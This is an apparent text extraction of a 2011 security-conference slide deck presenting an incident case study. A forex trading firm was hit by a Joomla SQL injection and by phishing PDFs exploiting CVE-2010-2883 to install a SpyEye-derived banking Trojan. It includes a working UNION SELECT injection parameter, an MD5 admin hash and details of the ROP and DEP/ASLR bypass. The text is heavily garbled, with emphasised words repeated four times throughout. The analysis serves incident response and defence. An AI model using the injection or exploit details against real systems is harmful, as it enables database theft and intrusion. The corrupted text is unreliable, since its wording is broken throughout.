cybercrime in nowadays businesses - a real case study of targeted attack

ORIGINAL SWISS ETHICAL HACKING

Your texte here ….

©2011 High-Tech Bridge SA – www.htbridge.ch

Hashdays 2011

Cybercrime in nowadays businesses:

A real case study of targeted attack

Frédéric BOURLA

Head of Ethical Hacking Department





0x00 - #whoami

Frédéric BOURLA

Head of Ethical Hacking Department

High-Tech Bridge SA

~12 years experience in Information Security

LPT, CISSP, CCSE, CCSA, ECSA, CEH, eCPPT

CHFI, GCFA & GREM in progress

RHCE, RHCT, MCP

[email protected]




0x01 - #readelf prez

� CyberCyberCyberCyber attacksattacksattacksattacks havehavehavehave evolvedevolvedevolvedevolved:

� They became moremoremoremore sophisticatedsophisticatedsophisticatedsophisticated

� They are oftenoftenoftenoften targetedtargetedtargetedtargeted

� It is not uncommon anymore to observeattacks managedmanagedmanagedmanaged bybybyby specializedspecializedspecializedspecialized groupsgroupsgroupsgroups andinitiated by unfairunfairunfairunfair competitorscompetitorscompetitorscompetitors

� This talk is an example of such threats. It isbased on a postpostpostpost----incidentincidentincidentincident investigationinvestigationinvestigationinvestigation whichtook place inininin OctoberOctoberOctoberOctober 2010201020102010. To preserveclient’s anonymity, let’slet’slet’slet’s callcallcallcall himhimhimhim FedorFedorFedorFedor----TradingTradingTradingTrading.

� 1 round of 50’. To save time, pleasepleasepleaseplease keepkeepkeepkeepyouryouryouryour questionsquestionsquestionsquestions until the end.




Table of contents

0x00 - About me

0x01 - About this conference

0x02 - Project’s context

0x03 - Mail analysis

0x04 - Client’s Website analysis

0x05 - Malware analysis

0x06 - Conclusion





� Last year, the CTOCTOCTOCTO ofofofof aaaa wellwellwellwell knownknownknownknown financialfinancialfinancialfinancial

institutioninstitutioninstitutioninstitution contactedcontactedcontactedcontacted usususus.

� FedorFedorFedorFedor----TradingTradingTradingTrading thoughtthoughtthoughtthought aboutaboutaboutabout aaaa kindkindkindkind ofofofof

PhishingPhishingPhishingPhishing attemptattemptattemptattempt, and the CTO expected us

to help him reassuring the CEO that

everything was fine, and that no real attack

really occurred.

� The initial project was a quickquickquickquick investigationinvestigationinvestigationinvestigation

drivendrivendrivendriven bybybyby politicalpoliticalpoliticalpolitical reasonsreasonsreasonsreasons, and it began

with an analysis of the emails that they

received in one of their administrative

mailboxes.




Table of contents

0x00 - About me






0x06 - Conclusion





� They receivedreceivedreceivedreceived severalseveralseveralseveral emailsemailsemailsemails which appeared

to have been sent from Fedor-Trading:





� At a first glance, all suspicious emails

received didn’tdidn’tdidn’tdidn’t looklooklooklook likelikelikelike PhishingPhishingPhishingPhishing:

� There is nononono multiplemultiplemultiplemultiple spellingspellingspellingspelling mistakemistakemistakemistake per

line

� The content itself sounds sophisticatedsophisticatedsophisticatedsophisticated

� All emails dealt with realrealrealreal mattermattermattermatter and

entice Forex users to open a PDFPDFPDFPDF

� Instead, all those emails sounded like

targetedtargetedtargetedtargeted attacksattacksattacksattacks.





� SMTP headers reveal the sending domain:





� FQDN matches IP address 67.227.134.84.

� The hosting server is located inininin USUSUSUS.





� Parent domain neonrain-vps.com belongs to

Neon Rain Interactive since 26 March 2008.





� Remote system hosted an outoutoutout----ofofofof----datedatedatedate ApacheApacheApacheApache

engine and is weaklyweaklyweaklyweakly configuredconfiguredconfiguredconfigured:

� Talkative banners

� Some indexed directories

� Lots of Information Disclosure

� Publicly available cPanel interface

� Some outdated components





� A reversereversereversereverse DNSDNSDNSDNS lookuplookuplookuplookup shown that the IP

address 67.227.134.84 was used to host

multiplemultiplemultiplemultiple websiteswebsiteswebsiteswebsites.

� At least 82 domains were hosted on the

same server.

� The combinationcombinationcombinationcombination ofofofof thesethesethesethese factorsfactorsfactorsfactors gave us a

strongstrongstrongstrong likelihoodlikelihoodlikelihoodlikelihood that malicious emails were

sent from a compromisedcompromisedcompromisedcompromised WebWebWebWeb serverserverserverserver, thus

concealingconcealingconcealingconcealing thethethethe identityidentityidentityidentity ofofofof attackersattackersattackersattackers.





� Domain host.neonrain-vps.com hadhadhadhad anananan MXMXMXMXrecordrecordrecordrecord for this host.

� This configuration permitted to bypassbypassbypassbypass mostmostmostmostantispamantispamantispamantispam protectionsprotectionsprotectionsprotections, and all Fedor-Trading’s clients who did not rely on adeeper SMTP analysis have probably receivedthose suspicious emails.

� A quick analysis of the received emailsconsequently lead us to thinkthinkthinkthink aboutaboutaboutabout aaaatargetedtargetedtargetedtargeted attackattackattackattack, and not to a blind one… Wedefinitely neededneededneededneeded totototo getgetgetget moremoremoremore informationinformationinformationinformationand asked for an FTP access to Fedor-Trading’s website.




Table of contents

0x00 - About me






0x06 - Conclusion





� The frontal website was hostedhostedhostedhosted externallyexternallyexternallyexternally,

on Infomaniak Network.

� The first thing we noticed is that the

website hosted a talkativetalkativetalkativetalkative «robots«robots«robots«robots....txt»txt»txt»txt» filefilefilefile:





� The passwd file revealed several forgotten

accounts, but no trace of a potential

compromise.

� The website contained hugehugehugehuge amountamountamountamount ofofofof logslogslogslogs.

We downloaded them to carry out local

inspection.





� Fedor-Trading’s website was oftenoftenoftenoften underunderunderunder

automatedautomatedautomatedautomated attacksattacksattacksattacks.





� In parallel with attackattackattackattack patternspatternspatternspatterns queriesqueriesqueriesqueries in

those huge logs (quitequitequitequite slowslowslowslow, as there were

nononono timeframetimeframetimeframetimeframe for this hypothetic attack), we

looked furtively at the website security

level.

� Despite a kind of Web Application Firewall

successfully prevented our first attacks,

the websitewebsitewebsitewebsite soundedsoundedsoundedsounded vulnerablevulnerablevulnerablevulnerable totototo SQLiSQLiSQLiSQLi.





� We parsed logs for usualusualusualusual SQLSQLSQLSQL injectionsinjectionsinjectionsinjections

signatures, and lotslotslotslots ofofofof occurrencesoccurrencesoccurrencesoccurrences were

also identified.





� QuiteQuiteQuiteQuite evolvedevolvedevolvedevolved injectionsinjectionsinjectionsinjections were attempted.

� First identified attacksattacksattacksattacks werewerewerewere unsuccessfulunsuccessfulunsuccessfulunsuccessful

and only reliedreliedreliedrelied onononon automatedautomatedautomatedautomated exploitationexploitationexploitationexploitation

tools.

� For example, banner & hexadecimal constant

used while trying to determine the number of

fields in the SQL query indicated HavijHavijHavijHavij tool.





� The next step therefore consisted in

simulating such automated attacks to assessassessassessassess

thethethethe levellevellevellevel ofofofof informationinformationinformationinformation whichwhichwhichwhich couldcouldcouldcould havehavehavehave

beenbeenbeenbeen collectedcollectedcollectedcollected by hackers.

� Indeed, we used thethethethe currentcurrentcurrentcurrent 1111....12121212 versionversionversionversion ofofofof

HavijHavijHavijHavij against Fedor-Trading.

� This tool hashashashas beenbeenbeenbeen provenprovenprovenproven inefficientinefficientinefficientinefficient in this

specific case.





� Nevertheless it permitted to confirmconfirmconfirmconfirm thethethethe

SQLiSQLiSQLiSQLi attackattackattackattack vectorvectorvectorvector, as the name of the

database was successfully dumped.





� In order to efficiently identify successful

SQLi exploitation in the huge web server

logs, wewewewe askedaskedaskedasked thethethethe clientclientclientclient forforforfor temporarytemporarytemporarytemporary

credentialscredentialscredentialscredentials onononon theirtheirtheirtheir Infomaniak’sInfomaniak’sInfomaniak’sInfomaniak’s webwebwebweb

administrationadministrationadministrationadministration page.

� This offered us the best view of operational

structures, and therefore permittedpermittedpermittedpermitted totototo finefinefinefine----

tunetunetunetune ourourourour queriesqueriesqueriesqueries with keywords which had a

high probability of occurrence in case of

successful SQLi exploitation.





� This was muchmuchmuchmuch fasterfasterfasterfaster.

� New attacksattacksattacksattacks werewerewerewere quicklyquicklyquicklyquickly identifiedidentifiedidentifiedidentified.

� More pernicious, those attacks clearly

shown that FedorFedorFedorFedor----Trading’sTrading’sTrading’sTrading’s websitewebsitewebsitewebsite waswaswaswas

compromisedcompromisedcompromisedcompromised, and that nearlynearlynearlynearly wholewholewholewhole backendbackendbackendbackend

databasedatabasedatabasedatabase waswaswaswas stolenstolenstolenstolen.





� Indeed, mostmostmostmost tablestablestablestables werewerewerewere remotelyremotelyremotelyremotely dumpeddumpeddumpeddumped by

hackers, and customerscustomerscustomerscustomers emailemailemailemail addressesaddressesaddressesaddresses ofofofof

ourourourour clientclientclientclient werewerewerewere stolenstolenstolenstolen.

� The sourcesourcesourcesource IPIPIPIP address 89.165.79.237 was

locatedlocatedlocatedlocated inininin IranIranIranIran and didn’t hosted any

publicly available service. It was most

probablyprobablyprobablyprobably aaaa botbotbotbot intended to hide attackers’

identity.





� The impacted web application consisted of

selfselfselfself----mademademademade codecodecodecode as well as JoomlaJoomlaJoomlaJoomla open

source CMS and several commercialcommercialcommercialcommercial pluginspluginspluginsplugins.

� The exploitedexploitedexploitedexploited vulnerabilityvulnerabilityvulnerabilityvulnerability resided in a

Joomla commercial plugin named ShShShSh404404404404SefSefSefSef.

The latter securitysecuritysecuritysecurity modulemodulemodulemodule provides SEOSEOSEOSEO,

analyticsanalyticsanalyticsanalytics and URLURLURLURL RewritingRewritingRewritingRewriting. It is also

supposedsupposedsupposedsupposed totototo preventpreventpreventprevent XSS,XSS,XSS,XSS, floodingfloodingfloodingflooding andandandand

otherotherotherother maliciousmaliciousmaliciousmalicious pagepagepagepage requestsrequestsrequestsrequests… But

unfortunatelyunfortunatelyunfortunatelyunfortunately itititit allowedallowedallowedallowed hackershackershackershackers totototo injectinjectinjectinject

SQLSQLSQLSQL codecodecodecode. In that particular case, the

securitysecuritysecuritysecurity modulemodulemodulemodule broughtbroughtbroughtbrought insecurityinsecurityinsecurityinsecurity.





� The SQLiSQLiSQLiSQLi injectioninjectioninjectioninjection vulnerability was a little

bit trickytrickytrickytricky, and nonenonenonenone ofofofof thethethethe leadingleadingleadingleading

automatedautomatedautomatedautomated toolstoolstoolstools waswaswaswas ableableableable totototo exploitexploitexploitexploit itititit.

� Most of them even didn’t detect any security

problem on Fedor-Trading’s website.

� Facts are that only a slowslowslowslow andandandand manualmanualmanualmanual

attackattackattackattack could have permitted its exploitation.





� As a PoC, we demonstrated that the

following parametersparametersparametersparameters inininin GETGETGETGET requestsrequestsrequestsrequests

permitted to remotely dumpdumpdumpdump allallallall sensitivesensitivesensitivesensitive

informationinformationinformationinformation from the backend database:





� In this attack, informationinformationinformationinformation leakageleakageleakageleakage occuredoccuredoccuredoccured

inininin thethethethe titletitletitletitle barbarbarbar of Internet browser’s

window.

� The 1111stststst requestrequestrequestrequest simply permits to identifyidentifyidentifyidentify thethethethe

PHPPHPPHPPHP engineengineengineengine versionversionversionversion.





� RequestsRequestsRequestsRequests 2222 andandandand 3333 permit to get usernameusernameusernameusername

and databasedatabasedatabasedatabase namenamenamename.





� RequestsRequestsRequestsRequests 4444 totototo 6666 permit to listlistlistlist databasesdatabasesdatabasesdatabases.





� GSDBGSDBGSDBGSDB onlyonlyonlyonly hostshostshostshosts 3333 databasesdatabasesdatabasesdatabases, as there is no

result for the 7777thththth GETGETGETGET requestrequestrequestrequest:

?id=3-9999+union+SELECT%20schema_name%20FROM

%20information_schema.schemata%20limit%203,1--





� RequestsRequestsRequestsRequests 8888 andandandand 9999 permits to get schemaschemaschemaschema andandandand

tablestablestablestables.





� The 10101010thththth requestrequestrequestrequest permits to enumerateenumerateenumerateenumerate

tablestablestablestables fromfromfromfrom mainmainmainmain databasedatabasedatabasedatabase.

� RequestRequestRequestRequest 11111111 enumerates columnscolumnscolumnscolumns fromfromfromfrom thethethethe

jos_usersjos_usersjos_usersjos_users tabletabletabletable.





� And finally the 12121212thththth requestrequestrequestrequest permits to

collectcollectcollectcollect names,names,names,names, emailsemailsemailsemails etetetet passwordspasswordspasswordspasswords hasheshasheshasheshashes

from the jos_users table.

� With a smallsmallsmallsmall automationautomationautomationautomation scriptscriptscriptscript, it was

possible totototo remotelyremotelyremotelyremotely dumpdumpdumpdump allallallall sensitivesensitivesensitivesensitive

tablestablestablestables, such as personalpersonalpersonalpersonal datadatadatadata relatedrelatedrelatedrelated totototo

ForexForexForexForex accountsaccountsaccountsaccounts from the TAibs_c table andandandand

tradingtradingtradingtrading platformplatformplatformplatform administrators'administrators'administrators'administrators' passwordpasswordpasswordpassword

hash from the USERS table.





� AfterAfterAfterAfter thethethethe versionversionversionversion 1111....5555,,,, JoomlaJoomlaJoomlaJoomla reliedreliedreliedrelied onononon a

randomrandomrandomrandom saltsaltsaltsalt in its password hashing

function.

� This approach permits to efficientlyefficientlyefficientlyefficiently disturbdisturbdisturbdisturb

TimeTimeTimeTime----MemoryMemoryMemoryMemory TradeOffTradeOffTradeOffTradeOff attacksattacksattacksattacks:

$hash=md5($pass.$salt)

� Since then, Rainbow Tables attacks against

accounts gathered from compromised

Joomla websites remain inefficient.




� Nevertheless, oneoneoneone ofofofof thethethethe administrators’administrators’administrators’administrators’

accountsaccountsaccountsaccounts hadhadhadhad nononono saltsaltsaltsalt. The password was

therefore stored in a weakweakweakweak MDMDMDMD5555 hashhashhashhash. It was

most probably an old account created with a

previous version of the web application,

which remained unchanged since the

migration.

� The vulnerablevulnerablevulnerablevulnerable accountaccountaccountaccount belonged to an

externalexternalexternalexternal consultantconsultantconsultantconsultant.

Anonymised:Anonymised:anonymised@anonymised

.com:c2e285cb33cecdbeb83d2189e983a8c0





� It was possible to breakbreakbreakbreak itititit inininin aaaa fewfewfewfew secondssecondssecondsseconds.

� HackersHackersHackersHackers nevernevernevernever loggedloggedloggedlogged withwithwithwith thisthisthisthis accountaccountaccountaccount.

� Fortunately, a noisynoisynoisynoisy defacingdefacingdefacingdefacing would have

been out of scope and totally

counterproductivecounterproductivecounterproductivecounterproductive.





� Internal admin accounts were salted and

strong enough to resist most dictionary

attacks.




Table of contents

0x00 - About me






0x06 - Conclusion





� After having stolen MySQL databases

through an SQL Injection on the trading

platform, hackers ran into a Social

Engineering phase which targeted Forex

users. Most of them received a credible fake

email which enticed into opening an embedded

PDF file.

� Therefore, thethethethe lastlastlastlast partpartpartpart ofofofof thethethethe attackattackattackattack which

required a deep analysis dealtdealtdealtdealt withwithwithwith thethethethe PDFPDFPDFPDF

files attached to the fake emails.

� SeveralSeveralSeveralSeveral emailsemailsemailsemails were sent, but all of them

included aaaa renamedrenamedrenamedrenamed versionversionversionversion ofofofof thethethethe samesamesamesame PDFPDFPDFPDF.





� PDFPDFPDFPDF isisisis oneoneoneone ofofofof thethethethe mostmostmostmost prevalentprevalentprevalentprevalent methodmethodmethodmethod forforforfor

remoteremoteremoteremote exploitationexploitationexploitationexploitation:

� Victims can be easily sent targeted

sociallysociallysociallysocially engineeredengineeredengineeredengineered emailsemailsemailsemails with such

attachments

� PDF links are common on websites and may

permit drivedrivedrivedrive----bybybyby exploitationexploitationexploitationexploitation

� This filefilefilefile formatformatformatformat isisisis widelywidelywidelywidely spreadspreadspreadspread among

companies and mostmostmostmost oftenoftenoftenoften authorizedauthorizedauthorizedauthorized bybybyby

perimeterperimeterperimeterperimeter protectionsprotectionsprotectionsprotections

� It is still quitequitequitequite hardhardhardhard forforforfor antivirusantivirusantivirusantivirus to

detect malicious content





� The 9999thththth OctoberOctoberOctoberOctober 2010201020102010, only 4444 antivirusantivirusantivirusantivirus onononon

43434343 detecteddetecteddetecteddetected aaaa threatthreatthreatthreat in this PDF, which is a

9999....3333%%%% detectiondetectiondetectiondetection raterateraterate:

� AntiVir

� Emsisoft

� Ikarus

� Microsoft

� One year later, the 13131313rdrdrdrd OctoberOctoberOctoberOctober 2011201120112011, only

16161616 antivirusantivirusantivirusantivirus onononon 43434343 efficiently detect a

threat. This is still a low detectiondetectiondetectiondetection raterateraterate ofofofof

37373737....2222%%%%.




� Indeed, PDFPDFPDFPDF supportssupportssupportssupports differentdifferentdifferentdifferent compressioncompressioncompressioncompression

formatsformatsformatsformats which helphelphelphelp hidinghidinghidinghiding codecodecodecode:

� FlateDecode

� ASCIIHexDecode

� LZWDecode

� ASCII85Decode

� RunLengthDecode

� It also supportssupportssupportssupports encryptionencryptionencryptionencryption:

� 40+128 bits RC4

� 128 bits AES






� And PDF format also natively supportssupportssupportssupports

Unicode,Unicode,Unicode,Unicode, HexHexHexHex asasasas wellwellwellwell asasasas fromCharCodefromCharCodefromCharCodefromCharCode. All

of them are widely used forforforfor obfuscationobfuscationobfuscationobfuscation

purpose.

� Internal logical streams cancancancan embedembedembedembed otherotherotherother

objectsobjectsobjectsobjects which support further client side

scripting, suchsuchsuchsuch asasasas Flash’Flash’Flash’Flash’ ActionScriptActionScriptActionScriptActionScript.

� It offers an efficientefficientefficientefficient waywaywayway totototo carrycarrycarrycarry outoutoutout HeapHeapHeapHeap

SprayingSprayingSprayingSpraying andandandand EggEggEggEgg HuntingHuntingHuntingHunting.

� For all those reasons, PDFPDFPDFPDF isisisis anananan attackattackattackattack

vectorvectorvectorvector ofofofof choicechoicechoicechoice forforforfor hackershackershackershackers.





� In our case, the maliciously crafted PDF fileexploited a critical vulnerability whichaffected all AdobeAdobeAdobeAdobe ReaderReaderReaderReader applicationsapplicationsapplicationsapplications priorpriorpriorpriortotototo versionversionversionversion 9999....4444 onononon multiplemultiplemultiplemultiple OSOSOSOS (CVE-2010-2883).

� Opening this file within Adobe Reader v9.3.4or any older version could alter itsexecution flow and runrunrunrun arbitraryarbitraryarbitraryarbitrary codecodecodecode.

� This vulnerability was actively exploited onInternet when the attack occurred. SinceAdobeAdobeAdobeAdobe ReaderReaderReaderReader vvvv....9999....4444 waswaswaswas publiclypubliclypubliclypublicly availableavailableavailableavailable onononon5555thththth OctoberOctoberOctoberOctober 2010201020102010, this attack implied a 0000----daydaydaydaywith a high rate of successful compromise.





� A quick searchsearchsearchsearch forforforfor riskyriskyriskyrisky keywordskeywordskeywordskeywords withinwithinwithinwithin

PDFIDPDFIDPDFIDPDFID revealed client-side code.

Quite unusual in malicious PDF

Action automatically performed

executed on form load





� The proportionproportionproportionproportion ofofofof randomnessrandomnessrandomnessrandomness in the file can

also telltelltelltell usususus moremoremoremore about this PDF.

� The totaltotaltotaltotal entropyentropyentropyentropy andandandand thethethethe entropyentropyentropyentropy ofofofof bytesbytesbytesbytes

insideinsideinsideinside streamsstreamsstreamsstreams objects are closeclosecloseclose totototo thethethethe maxmaxmaxmax

ofofofof 8888, which suggestsuggestsuggestsuggest aaaa normalnormalnormalnormal PDFPDFPDFPDF document.





� Nevertheless, the entropyentropyentropyentropy outsideoutsideoutsideoutside streamsstreamsstreamsstreams

objectobjectobjectobject isisisis alsoalsoalsoalso quitequitequitequite highhighhighhigh. In a normal PDF, it

is usually between 4 and 5. This may leadsleadsleadsleads

usususus totototo thinkthinkthinkthink aboutaboutaboutabout aaaa malformedmalformedmalformedmalformed PDFPDFPDFPDF

document,document,document,document, wherewherewherewhere datadatadatadata isisisis addedaddedaddedadded withoutwithoutwithoutwithout

streastreastreastreammmm objectsobjectsobjectsobjects.

� We can also notice that there is onlyonlyonlyonly oneoneoneone

%%%%%%%%EOFEOFEOFEOF inininin thethethethe documentdocumentdocumentdocument, despite there are

lotslotslotslots ofofofof bytesbytesbytesbytes afterafterafterafter thethethethe lastlastlastlast %%%%%%%%EOFEOFEOFEOF, which

alsoalsoalsoalso suggestssuggestssuggestssuggests thatthatthatthat datadatadatadata hashashashas beenbeenbeenbeen addedaddedaddedadded.





� So a good idea should be to dig a little bit

further through OrigamiOrigamiOrigamiOrigami. Unfortunately the

WalkerWalkerWalkerWalker GUIGUIGUIGUI waswaswaswas trickedtrickedtrickedtricked intointointointo errorserrorserrorserrors.





� CommandCommandCommandCommand linelinelineline extractionextractionextractionextraction alsoalsoalsoalso gotgotgotgot problemsproblemsproblemsproblems,

but at least confirmed some results.





� In fact, eveneveneveneven AdobeAdobeAdobeAdobe thoughtthoughtthoughtthought itititit waswaswaswas damageddamageddamageddamaged.

Unfortunately he managedmanagedmanagedmanaged totototo readreadreadread itititit.





� Logical flaw Logical flaw Logical flaw Logical flaw remained easy to identifyeasy to identifyeasy to identifyeasy to identify.





� Nevertheless, we were stillstillstillstill notnotnotnot ableableableable totototo

extractextractextractextract embedded JavaScriptJavaScriptJavaScriptJavaScript code.





� ObjectObjectObjectObject 3333 contains the string “/JavaScript”

and was configuredconfiguredconfiguredconfigured totototo executeexecuteexecuteexecute codecodecodecode fromfromfromfrom

objectobjectobjectobject 7777. ObjectObjectObjectObject 30303030 alsoalsoalsoalso containedcontainedcontainedcontained the

string “/JS” and holds codecodecodecode.





� Nevertheless, the payloadpayloadpayloadpayload was quite heavily

obfuscatedobfuscatedobfuscatedobfuscated.





� MostMostMostMost craftedcraftedcraftedcrafted PDFPDFPDFPDF relyrelyrelyrely onononon simplesimplesimplesimple XORXORXORXOR with a

single byte long key orororor useuseuseuse ROL/RORROL/RORROL/RORROL/ROR

operations for obfuscation purpose…

� But notnotnotnot theretheretherethere. As a consequence, tools like

XorSearchXorSearchXorSearchXorSearch didn’tdidn’tdidn’tdidn’t getgetgetget anyanyanyany resultresultresultresult.

� The only one solutionsolutionsolutionsolution seemed to be the

reverse engineeringengineeringengineeringengineering approachapproachapproachapproach.





� Indeed, interesting content was encrypted

with a 4444 bytesbytesbytesbytes XORXORXORXOR operationoperationoperationoperation.





� After the identification of the 4 bytes key

0x4114D345, we were able to extractextractextractextract thethethethe

“mea“mea“mea“mea....dll”dll”dll”dll” filefilefilefile embedded in the malicious PDF.

� This one was notnotnotnot encryptedencryptedencryptedencrypted, and revealedrevealedrevealedrevealed

thethethethe finalfinalfinalfinal URLURLURLURL which hosted the ultimate

payload, as confirmed by following analysis.





� Opening CoolTypeCoolTypeCoolTypeCoolType....dlldlldlldll in Adobe Reader with

IDA revealed the abusedabusedabusedabused “strcat“strcat“strcat“strcat””””. The

“uniqueName”“uniqueName”“uniqueName”“uniqueName” fieldfieldfieldfield fromfromfromfrom thethethethe SINGSINGSINGSING tabletabletabletable

structure was being used in that function.





� The exploit relied on /AcroForm/AcroForm/AcroForm/AcroForm JavaScript

totototo detectdetectdetectdetect thethethethe versionversionversionversion ofofofof AdobeAdobeAdobeAdobe ReaderReaderReaderReader and

switchswitchswitchswitch totototo thethethethe appropriateappropriateappropriateappropriate payloadpayloadpayloadpayload.

� Then the heapheapheapheap sprayspraysprayspray was used totototo putputputput ROPROPROPROP

datadatadatadata intointointointo memorymemorymemorymemory at a guessable address.

This heap spray followed a huge RED sled,

which acted as a more classical NOP string

while transitioning between the stack Buffer

Overflow and the ROP payload.

� GadgetsGadgetsGadgetsGadgets usedusedusedused inininin thethethethe ROPROPROPROP payloadpayloadpayloadpayload come from

module “icucnvicucnvicucnvicucnv36363636....dlldlldlldll”, which was notnotnotnot

compiledcompiledcompiledcompiled withwithwithwith ASLRASLRASLRASLR, as discussed soon.





� Attackers used ROPROPROPROP techniquestechniquestechniquestechniques. Instead of

redirecting the execution flow on the heap,

it jumpsjumpsjumpsjumps totototo aaaa CodeCodeCodeCode sectionsectionsectionsection inininin aaaa DLLDLLDLLDLL which

indeed has the Execute rights. This is

achieved bybybyby overwritingoverwritingoverwritingoverwriting thethethethe SavedSavedSavedSaved EIPEIPEIPEIP onononon thethethethe

stack,stack,stack,stack, andandandand bybybyby chainingchainingchainingchaining callscallscallscalls onononon thisthisthisthis DLLDLLDLLDLL at

specific places through a RET sled crafted

on the stack.





� The exploit created an emptyemptyemptyempty isoisoisoiso88591885918859188591 filefilefilefile

and mappedmappedmappedmapped itititit totototo memorymemorymemorymemory in order to get an

executableexecutableexecutableexecutable spacespacespacespace, where shellcode could be

copied and executed.





� The AcroRd32.exe process was also abused

to loadloadloadload icucnvicucnvicucnvicucnv34343434....dlldlldlldll module, a DLL which

was notnotnotnot compiledcompiledcompiledcompiled withwithwithwith ASLRASLRASLRASLR and is therefore

always loadedloadedloadedloaded atatatat thethethethe samesamesamesame addressaddressaddressaddress in

memory. ItItItIt isisisis thenthenthenthen possiblepossiblepossiblepossible totototo useuseuseuse itsitsitsits ownownownown IATIATIATIAT

totototo getgetgetget thethethethe addressaddressaddressaddress ofofofof KernelKernelKernelKernel32323232 ASLRedASLRedASLRedASLRed

APIsAPIsAPIsAPIs.





� As a consequence, bothbothbothboth DEPDEPDEPDEP &&&& ASLRASLRASLRASLR werewerewerewere

bypassedbypassedbypassedbypassed!

� Finally, the exploit alsoalsoalsoalso workedworkedworkedworked onononon VistaVistaVistaVista andandandand

7777, as it didn’tdidn’tdidn’tdidn’t useuseuseuse hardcodedhardcodedhardcodedhardcoded XPXPXPXP syscallsyscallsyscallsyscall.

� So basically itititit waswaswaswas alreadyalreadyalreadyalready thethethethe endendendend of the

game…





� MalwareMalwareMalwareMalware alsoalsoalsoalso usedusedusedused somesomesomesome trickstrickstrickstricks totototo preventpreventpreventprevent

itsitsitsits analysisanalysisanalysisanalysis. For example, each time we used a

MemoryMemoryMemoryMemory BPBPBPBP, we arrivedarrivedarrivedarrived inininin aaaa longlonglonglong looplooplooploop which

always endedendedendedended bybybyby anananan exceptionexceptionexceptionexception.

� After having dropped another binary from

itself, the “mea“mea“mea“mea....dll”dll”dll”dll” overwritesoverwritesoverwritesoverwrites partpartpartpart ofofofof itsitsitsits

ownownownown TextTextTextText sectionsectionsectionsection totototo preventpreventpreventprevent memorymemorymemorymemory dumpdumpdumpdump.

� Malware also skipped part of its code while

running within Immunity Debugger. For

example, the “adobe1.exe” file was not

dropped, even if hidedebug plugin was used.




� AnotherAnotherAnotherAnother tricktricktricktrick waswaswaswas totototo parseparseparseparse processesprocessesprocessesprocesses namenamenamename.

When Process Monitor was running, we

didn’t see anything… We had far more

results by just renaming the tool, we

showedshowedshowedshowed thethethethe creationcreationcreationcreation ofofofof aaaa newnewnewnew binarybinarybinarybinary.

� File access monitoring confirmed the

creation of the new “adobe1.exe” binary.





� This new binary was an unencrypted dropperunencrypted dropperunencrypted dropperunencrypted dropper.





� This was also confirmedconfirmedconfirmedconfirmed throughthroughthroughthrough aaaa behaviourbehaviourbehaviourbehaviour

analysisanalysisanalysisanalysis.

� Here we simply used a roguerogueroguerogue DNSDNSDNSDNS serviceserviceserviceservice to

redirectredirectredirectredirect traffictraffictraffictraffic to an analysis server.





� This process downloadeddownloadeddownloadeddownloaded thethethethe “update“update“update“update2222....exe”exe”exe”exe”

binarybinarybinarybinary on www.bringithomedude.com.





� And here we are! The finalfinalfinalfinal aimaimaimaim ofofofof hackershackershackershackers

waswaswaswas totototo silentlysilentlysilentlysilently getgetgetget andandandand executeexecuteexecuteexecute aaaa bankingbankingbankingbanking

TrojanTrojanTrojanTrojan derived from SpyEyes code.

� So let’s summarize what’s happened here.





� The file adobeadobeadobeadobe1111....exeexeexeexe isisisis aaaa simplesimplesimplesimple loaderloaderloaderloader of

2’560 bytes. It was notnotnotnot encryptedencryptedencryptedencrypted.

� On the other hand, the final updateupdateupdateupdate2222....exeexeexeexe

malware was a C# based binary of 668 Kb

which includedincludedincludedincluded severalseveralseveralseveral protectionsprotectionsprotectionsprotections aimed at

preventing its reverse engineering.

DisassemblyDisassemblyDisassemblyDisassembly revealedrevealedrevealedrevealed BASEBASEBASEBASE64646464 encodingencodingencodingencoding for

raw data asasasas wellwellwellwell asasasas encryptionencryptionencryptionencryption algorithmsalgorithmsalgorithmsalgorithms

basedbasedbasedbased onononon MDMDMDMD5555 (System.Security.Cryptogra

phy.MD5CryptoServiceProvider), 3333DESDESDESDES (Sys

tem.Security.Cryptography.TripleDESCryptS

erviceProvider) and AESAESAESAES (System.Security.

Cryptography.RijndaelManaged).





� When this attack occurred, Those files were

undetectedundetectedundetectedundetected bybybyby mostmostmostmost antivirusantivirusantivirusantivirus.

� A few European antivirus detected a

potential threat, but allallallall EasternEasternEasternEastern solutionssolutionssolutionssolutions

such as Kaspersky, NOD32, DrWeb32 or

VBA32 didn’tdidn’tdidn’tdidn’t detectdetectdetectdetect anythinganythinganythinganything.

� It is therefore possiblepossiblepossiblepossible thatthatthatthat thethethethe RussianRussianRussianRussian

marketmarketmarketmarket waswaswaswas thethethethe initialinitialinitialinitial targettargettargettarget of our malware

writers.





� The 8888thththth OctoberOctoberOctoberOctober 2010201020102010, 16 antivirus on 43

detected a potential threat in the final

binary. DetectionDetectionDetectionDetection raterateraterate waswaswaswas aboutaboutaboutabout 37373737%%%%.

� The 15151515thththth OctoberOctoberOctoberOctober 2010201020102010, 19 antivirus on 43

were efficient. DetectionDetectionDetectionDetection raterateraterate isisisis aboutaboutaboutabout 44444444%%%%.

� Around 8 months later, the 2222ndndndnd JuneJuneJuneJune 2011201120112011,

34 antivirus on 43 detected a potential

threat. This is a detectiondetectiondetectiondetection raterateraterate ofofofof 79797979%%%%.

� Kaspersky, McAfee, Sophos and Microsoft

were the most reactive.





� Gdata, Panda and Sophos were the nextones.

� ClamAV, eSafe, F-Secure, Fortinet & PrevXhave proven far less effective.

� The finalfinalfinalfinal payloadpayloadpayloadpayload behavebehavebehavebehave likelikelikelike ZbotZbotZbotZbot. It wasbasedbasedbasedbased onononon aaaa mutationmutationmutationmutation ofofofof SpyEyesSpyEyesSpyEyesSpyEyes. It is aTrojanTrojanTrojanTrojan aimedaimedaimedaimed totototo targettargettargettarget financialfinancialfinancialfinancial sectorsectorsectorsector andit is able to disable Windows Firewall andsteal financial data, such as credit cardnumbers, eBanking information or tradingcredentials. Common Trojan features werealso available, such screen capture,additional malware download or remoteadministration capabilities.





� Upon execution, the TrojanTrojanTrojanTrojan createscreatescreatescreates aaaa folderfolderfolderfolder

namednamednamednamed svhostxxupsvhostxxupsvhostxxupsvhostxxup....exeexeexeexe inininin thethethethe cccc::::\\\\ drive. Then it

createscreatescreatescreates filesfilesfilesfiles configconfigconfigconfig....binbinbinbin andandandand svhostxxupsvhostxxupsvhostxxupsvhostxxup....exeexeexeexe

in that folder.

� The latterlatterlatterlatter binarybinarybinarybinary is then called. It is

responsibleresponsibleresponsibleresponsible forforforfor creatingcreatingcreatingcreating newnewnewnew memorymemorymemorymemory pagespagespagespages

